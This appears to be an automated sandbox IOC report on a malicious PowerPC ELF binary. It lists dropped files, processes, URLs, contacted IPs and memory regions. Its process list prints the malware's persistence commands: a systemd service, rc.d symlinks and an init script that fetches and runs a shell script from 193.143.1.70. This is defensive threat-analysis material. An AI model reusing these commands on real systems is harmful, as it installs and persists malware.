IOC Report
powerpc.nn.elf

loading gif

Files

File Path
Type
Category
Malicious
powerpc.nn.elf
ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
initial sample
 malicious
/etc/init.d/powerpc.nn.elf
POSIX shell script, ASCII text executable
dropped
 malicious
/etc/init.d/system
POSIX shell script, ASCII text executable
dropped
 malicious
/etc/profile
ASCII text
dropped
 malicious
/etc/rc.local
POSIX shell script, ASCII text executable
dropped
 malicious
/boot/bootcmd
ASCII text
dropped
/etc/inittab
ASCII text
dropped
/etc/motd
ASCII text
dropped
/etc/systemd/system/custom.service
ASCII text
dropped
/memfd:snapd-env-generator (deleted)
ASCII text
dropped
/run/user/127/dconf/user
very short file (no magic)
dropped
/tmp/qemu-open.ifyKlD (deleted)
data
dropped
There are 2 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
/tmp/powerpc.nn.elf
/tmp/powerpc.nn.elf
/tmp/powerpc.nn.elf
-
/tmp/powerpc.nn.elf
-
/bin/sh
sh -c "systemctl enable custom.service >/dev/null 2>&1"
/bin/sh
-
/usr/bin/systemctl
systemctl enable custom.service
/tmp/powerpc.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/system
/tmp/powerpc.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/system /etc/rcS.d/S99system
/tmp/powerpc.nn.elf
-
/bin/sh
sh -c "echo \"#!/bin/sh\n# /etc/init.d/powerpc.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting powerpc.nn.elf'\n /tmp/powerpc.nn.elf &\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping powerpc.nn.elf'\n killall powerpc.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/powerpc.nn.elf"
/tmp/powerpc.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/powerpc.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/powerpc.nn.elf
/tmp/powerpc.nn.elf
-
/bin/sh
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
/bin/sh
-
/usr/bin/mkdir
mkdir -p /etc/rc.d
/tmp/powerpc.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/powerpc.nn.elf /etc/rc.d/S99powerpc.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/powerpc.nn.elf /etc/rc.d/S99powerpc.nn.elf
/tmp/powerpc.nn.elf
-
/tmp/powerpc.nn.elf
-
/tmp/powerpc.nn.elf
-
/tmp/powerpc.nn.elf
-
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/libexec/gnome-session-binary
-
/bin/sh
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/lib/systemd/systemd
-
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/sbin/gdm3
-
/etc/gdm3/PrimeOff/Default
/etc/gdm3/PrimeOff/Default
/usr/sbin/gdm3
-
/etc/gdm3/PrimeOff/Default
/etc/gdm3/PrimeOff/Default
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
There are 45 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi
unknown
http://193.143.1.70/curl.sh
unknown
http://193.143.1.70/lol.sh
unknown
http://193.143.1.70/
unknown

IPs

IP
Domain
Country
Malicious
45.212.236.113
unknown
Zambia
143.59.83.105
unknown
United States
151.180.166.107
unknown
United Kingdom
70.114.243.4
unknown
United States
100.206.241.216
unknown
United States
68.26.246.2
unknown
United States
221.219.245.198
unknown
China
16.142.32.47
unknown
United States
111.145.189.76
unknown
China
80.113.163.237
unknown
Netherlands
207.169.121.137
unknown
United States
130.200.49.56
unknown
United States
194.195.194.150
unknown
Germany
91.86.56.83
unknown
Belgium
167.248.217.80
unknown
United States
223.134.94.172
unknown
Japan
142.23.137.20
unknown
Canada
203.137.20.111
unknown
Japan
180.114.88.139
unknown
China
220.230.200.191
unknown
Korea Republic of
11.96.67.142
unknown
United States
112.134.162.54
unknown
Sri Lanka
49.13.42.140
unknown
Germany
72.255.8.234
unknown
Pakistan
151.37.26.162
unknown
Italy
50.69.55.40
unknown
Canada
11.23.48.166
unknown
United States
31.91.119.215
unknown
United Kingdom
199.23.120.65
unknown
Canada
20.138.75.127
unknown
United States
211.47.187.70
unknown
Korea Republic of
143.176.221.79
unknown
Netherlands
118.116.156.16
unknown
China
147.187.215.147
unknown
United States
65.154.91.12
unknown
United States
189.22.187.120
unknown
Brazil
1.242.114.124
unknown
Korea Republic of
215.192.224.172
unknown
United States
120.218.50.100
unknown
China
177.79.0.35
unknown
Brazil
126.85.116.8
unknown
Japan
219.161.217.31
unknown
Japan
37.221.160.225
unknown
Romania
99.209.25.35
unknown
Canada
60.14.108.33
unknown
China
73.92.7.120
unknown
United States
14.249.184.121
unknown
Viet Nam
159.77.4.80
unknown
United States
117.227.162.175
unknown
India
197.142.3.220
unknown
Algeria
106.235.60.164
unknown
China
73.169.49.125
unknown
United States
71.143.22.185
unknown
United States
194.224.2.32
unknown
Spain
197.167.204.196
unknown
Egypt
204.151.53.127
unknown
United States
58.19.248.154
unknown
China
57.89.233.59
unknown
Belgium
84.191.58.209
unknown
Germany
160.16.177.244
unknown
Japan
186.178.123.0
unknown
Ecuador
111.201.198.48
unknown
China
206.11.252.2
unknown
United States
19.96.175.25
unknown
United States
61.92.76.51
unknown
Hong Kong
183.234.202.150
unknown
China
181.39.145.149
unknown
Ecuador
137.186.28.11
unknown
Canada
41.146.16.10
unknown
South Africa
218.102.173.1
unknown
Hong Kong
142.1.70.119
unknown
Canada
40.104.211.100
unknown
United States
193.143.1.70
unknown
unknown
7.235.242.101
unknown
United States
145.204.227.231
unknown
Netherlands
223.190.122.2
unknown
India
208.103.126.40
unknown
United States
115.121.200.170
unknown
China
42.29.243.244
unknown
Korea Republic of
175.151.231.156
unknown
China
161.24.208.165
unknown
Brazil
156.128.211.194
unknown
United States
204.75.146.4
unknown
United States
108.91.182.213
unknown
United States
128.201.123.111
unknown
Brazil
67.218.123.239
unknown
United States
125.104.137.148
unknown
China
159.71.78.231
unknown
United States
38.54.138.102
unknown
United States
4.42.219.188
unknown
United States
42.199.89.8
unknown
China
222.13.145.230
unknown
Japan
193.6.149.228
unknown
Hungary
179.92.77.228
unknown
Brazil
5.127.49.180
unknown
Iran (ISLAMIC Republic Of)
89.149.208.235
unknown
Netherlands
9.96.235.182
unknown
United States
99.38.201.247
unknown
United States
152.78.46.251
unknown
United Kingdom
28.193.74.20
unknown
United States
There are 90 hidden IPs, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
7f7edc01c000
page execute read
 malicious
7f7edc01c000
page execute read
 malicious
5610b2dd2000
page execute read
7f7fd4f9e000
page read and write
7fff46657000
page read and write
5610b2dd2000
page execute read
7f7edc02d000
page read and write
7f7fd4fe3000
page read and write
7f7fcc021000
page read and write
7f7fd4fe3000
page read and write
7f7fd4afd000
page read and write
5610b5071000
page read and write
7f7fd4f96000
page read and write
5610b505b000
page execute and read and write
7f7fd4e6d000
page read and write
7f7fd4b22000
page read and write
7f7fcc000000
page read and write
5610b505b000
page execute and read and write
7f7fd449e000
page read and write
7f7fd449e000
page read and write
7fff46657000
page read and write
5610b305d000
page read and write
5610b305d000
page read and write
7f7edc031000
page read and write
7f7fd4f9e000
page read and write
5610b6cd5000
page read and write
7fff4677b000
page execute read
7f7fd44ac000
page read and write
7f7fd4afd000
page read and write
7f7fd3c9b000
page read and write
7f7fd44ac000
page read and write
7f7edc036000
page read and write
7f7fd3c9b000
page read and write
7f7fcc021000
page read and write
7f7edc02d000
page read and write
5610b5071000
page read and write
7f7fcc000000
page read and write
7f7fd4e6d000
page read and write
5610b3055000
page read and write
7fff4677b000
page execute read
5610b3055000
page read and write
7f7fd473b000
page read and write
7f7fd4f96000
page read and write
7f7edc031000
page read and write
5610b6cd5000
page read and write
7f7fd473b000
page read and write
7f7fd4b22000
page read and write
There are 37 hidden memdumps, click here to show them.